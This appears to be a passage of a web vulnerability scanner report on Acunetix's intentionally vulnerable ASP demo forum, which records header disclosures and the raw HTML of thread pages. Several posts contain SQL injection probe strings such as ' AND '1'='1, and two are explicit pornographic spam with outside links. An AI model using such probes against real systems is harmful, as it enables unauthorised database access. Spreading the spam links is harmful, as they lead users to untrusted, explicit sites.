<tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=39 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=39 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:31 GMT Content-Length: 4374 |
| Response Body - size: 4,374 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Shemale Sexy Galleries </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D39" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Shemale Sexy Galleries </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ineshy11</b> on 3/14/2022 6:42:20 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Shemale Sexy Galleries - 185.107.47.171</div><div class='posttext'>Enjoy daily galleries http://gay.porn.porn.miyuhot.com/?amara allentown pa highschool porn ebony male porn biggest list of porn asian free videos porn free lesbian hot women porn video </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=4 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 336 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=4 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:26 GMT Content-Length: 4139 |
| Response Body - size: 4,139 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D4" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" AND "1"="1" -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=40 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=40 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:31 GMT Content-Length: 4491 |
| Response Body - size: 4,491 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Nude Sex Pics, Sexy Naked Women, Hot Girls Porn </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Nude Sex Pics, Sexy Naked Women, Hot Girls Porn </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>myrnaou3</b> on 3/14/2022 7:22:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Nude Sex Pics, Sexy Naked Women, Hot Girls Porn - 185.220.101.42</div><div class='posttext'>Hot galleries, daily updated collections http://dawnyangporn.momroleplayporn.adablog69.com/?martha indiana born porn star free female solo porn upload your amateur porn vids free porn bisexual videos step dads force girls porn </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=5 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 336 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=5 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:26 GMT Content-Length: 4130 |
| Response Body - size: 4,130 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D5" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> AND 1=1</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=6 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 336 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=6 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:26 GMT Content-Length: 4134 |
| Response Body - size: 4,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D6" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' AND '1'='1</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=7 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 336 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=7 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:26 GMT Content-Length: 4134 |
| Response Body - size: 4,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D7" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" AND "1"="1</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=8 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 336 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=8 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:26 GMT Content-Length: 4123 |
| Response Body - size: 4,123 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D8" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>%</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" 